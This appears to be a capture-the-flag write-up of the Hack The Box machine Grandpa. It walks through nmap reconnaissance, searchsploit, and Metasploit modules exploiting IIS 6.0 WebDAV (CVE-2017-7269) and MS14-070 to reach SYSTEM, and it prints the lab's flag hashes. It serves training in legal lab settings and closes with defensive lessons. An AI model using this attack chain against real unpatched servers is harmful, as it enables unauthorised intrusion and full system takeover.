Keep Calm and Hack The Box – Taking Down Grandpa

Mastering penetration testing skills requires practice, and lots of it. While building your own virtual labs is always an option, it can be time consuming to set up realistic scenarios. This is where online platforms like Hack The Box come into play. Hack The Box, or HTB for short, provides a fun gamified environment to legally hack machines and hone your offensive skills.

One of the easier retired machines on HTB is Grandpa. This Windows box showcases a critical vulnerability in IIS 6.0 web servers, CVE-2017-7269, which can be exploited to gain remote code execution. Despite being a lower point value box, it still teaches valuable lessons that can be applied to real-world penetration tests and red team engagements.

In this write-up, we‘ll walk through the steps needed to compromise Grandpa from start to finish. We‘ll cover the methodology, tools used, and exploits needed to go from zero initial access to SYSTEM privileges on the box. Let‘s dive in!

Tools of the Trade

Before starting our attack, we‘ll need to arm ourselves with a few utilities in our penetration testing toolkit:

• Nmap – This versatile network scanning tool will help us identify open ports and fingerprint services running on the box
• Searchsploit – We can use this to search for publicly available exploits and vulnerability details that match versions of software found
• Metasploit Framework – The most popular penetration testing framework that packs a large collection of exploits and payloads to use
• Local Exploit Suggester – This handy Metasploit module can quickly highlight missing patches and potential privilege escalation vectors

With our tools prepped and ready, let‘s move to the first phase of our attack.

Reconnaissance

The initial step in attacking any machine is always reconnaissance. Before we can exploit a target, we need to understand what it‘s running. A few well-crafted Nmap scans can help light the way.

To kick things off, we‘ll run a service version detection scan against Grandpa using the following Nmap command:

nmap -sV -sC -p- -oA grandpa 10.10.10.14

Here‘s a quick breakdown of the flags used:

• -sV: enables service/version detection to fingerprint services on open ports
• -sC: runs the default Nmap scripts to further enumerate the services
• -p-: scans all 65,535 TCP ports instead of just the top 1000
• -oA: outputs the results in all major formats with a basename of "grandpa"

Our scan returns just a single port open:

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_  Server Date: Fri, 11 Sep 2020 15:25:44 GMT

Right off the bat, this tells us the box is running a web server on port 80, specifically Microsoft IIS version 6.0. The web page itself doesn‘t contain much, just an "Under Construction" message. However, the Nmap HTTP scripts provide some juicy info.

First, it appears the server has WebDAV enabled. WebDAV is an extension of HTTP that allows clients to perform remote content authoring, such as reading and editing files on the web server. The script lists off several WebDAV methods like PUT and MOVE that are allowed.

Before moving on, we‘ll try one more Nmap script to see if it can glean any additional details on the WebDAV configuration:

nmap --script http-webdav-scan -p80 10.10.10.14

Unfortunately, this doesn‘t give us much else to go off of. At this point, let‘s see if Searchsploit turns up any leads.

Seeking Exploits

With the service and version information collected, we can check if any exploits exist for IIS 6.0:

searchsploit iis 6.0

This returns quite a few results, including a very interesting one for a remote code execution vulnerability. We can dig into the details more by appending the Exploit-DB ID to the command:

searchsploit -x 41738

The exploit code itself provides insightful details in the comments:

# Exploit Title: Microsoft IIS WebDav ScStoragePathFromUrl Overflow
# Date: 26-05-2017
# Exploit Author: Zhiniang Peng and Chen Wu
# Vendor Homepage: https://www.iis.net/
# Version: Version 6.0
# CVE: CVE-2017-7269
# Reference: https://github.com/edwardz246003/IIS_exploit

So it appears this is exploiting CVE-2017-7269, a buffer overflow in the ScStoragePathFromUrl function of the WebDAV module. The vulnerability is due to improper validation of long headers in PROPFIND requests. Successful exploitation results in remote code execution under the context of the web server.

At the time, this was a major vulnerability as it affected all versions of IIS 6.0 in the default configuration. An attacker could gain complete control over unpatched servers, as we‘ll see shortly.

Exploiting WebDAV

Since the vulnerability lies in the WebDAV component, let‘s see if we can interact with it directly using a tool called davtest.

davtest -url http://10.10.10.14

The results indicate that we can perform GET requests, but the tool wasn‘t able to successfully upload a file using PUT. We‘ll likely need to aim for a more direct exploit rather than manually abusing WebDAV methods.

Turning back to Metasploit, we find there is a module already available to exploit CVE-2017-7269. Let‘s select it and view the options:

msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options

The only required setting is the RHOSTS, which we‘ll set to the IP of Grandpa. We can then kick off the exploit:

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
RHOSTS => 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

And with that, we receive a session with NT AUTHORITY\Network Service privileges. While not SYSTEM, this is still a foothold we can use to further enumerate the box and pivot to other attacks.

Privilege Escalation

Now that we have an initial shell, we can probe for privilege escalation vulnerabilities. One easy way to do this is with the local_exploit_suggester module:

meterpreter > run post/multi/recon/local_exploit_suggester 
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 38 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target appears to be vulnerable.

The suggester reports quite a few missing patches that we could potentially exploit. For this box, we‘ll use MS14-070. This vulnerability allows an attacker to execute arbitrary code with elevated privileges by exploiting a flaw in the TCP/IP IOCTL handler.

We can select the appropriate module and set our active session as the payload:

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST tun0
LHOST => 10.10.14.21
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

The exploit takes a few seconds to run, but afterwards we‘re greeted with a shiny new shell running with SYSTEM privileges. We can verify this with the handy getuid command:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Capturing the Flags

Now that we have full administrative control over the box, we can seek out those juicy flags. On Windows machines, the user flag is usually located on the user‘s Desktop. We can browse to the Harry user and snag it:

meterpreter > cd c:\documents and settings\harry\desktop
meterpreter > cat user.txt
bdff5ec67c3cff017f2bedc146a5d869

Similarly, the root flag on HTB is conventionally found on the Administrator‘s desktop:

meterpreter > cd c:\documents and settings\administrator\desktop
meterpreter > cat root.txt
9359e905a2c35f861f6a57cecf28bb7b

With that, we‘ve fully compromised the Grandpa machine! We can now pat ourselves on the back for a job well done.

Lessons Learned

While a fairly straightforward box, Grandpa still provides some key takeaways that can be applied to real-world engagements:

1. Proper patch management is critical. The CVE-2017-7269 and MS14-070 vulnerabilities exploited were both patched years before the release of this box. Staying up-to-date on security updates could have prevented the box from being compromised.

2. Be mindful of excessive service configurations. While WebDAV has legitimate uses, it‘s rarely needed on public-facing servers. Unnecessarily exposing WebDAV methods increases the attack surface and enables exploits like this to succeed. Regularly auditing and restricting configurations to only what‘s essential goes a long way.

3. Privilege separation is important. Although IIS servers often run under privileged accounts, enforcing stricter user permissions can help contain the damage of an initial compromise. Defense in depth measures like this complicate lateral movement and privilege escalation.

4. Multiple exploits are frequently used in a single attack chain. It‘s common for attackers to exploit several vulnerabilities in succession, as we saw with the initial access via WebDAV RCE and privilege escalation through the TCP/IP IOCTL handler. Defending against multi-stage attacks requires a comprehensive security approach.

Grandpa may be a simple target, but the techniques used and concepts covered lay a solid foundation for attacking more challenging machines. The basic methodology of reconnaissance, service enumeration, exploitation, and privilege escalation remains the same regardless of the target.

With enough persistence and a analytical mindset, no system is beyond compromise. Through practice on lab environments like Hack The Box, we can hone our offensive tradecraft. As pentesters and red teamers, this allows us to provide better security assessments and ultimately help defend organizations against real adversaries.

Now, go forth and hack all the things (ethically of course)!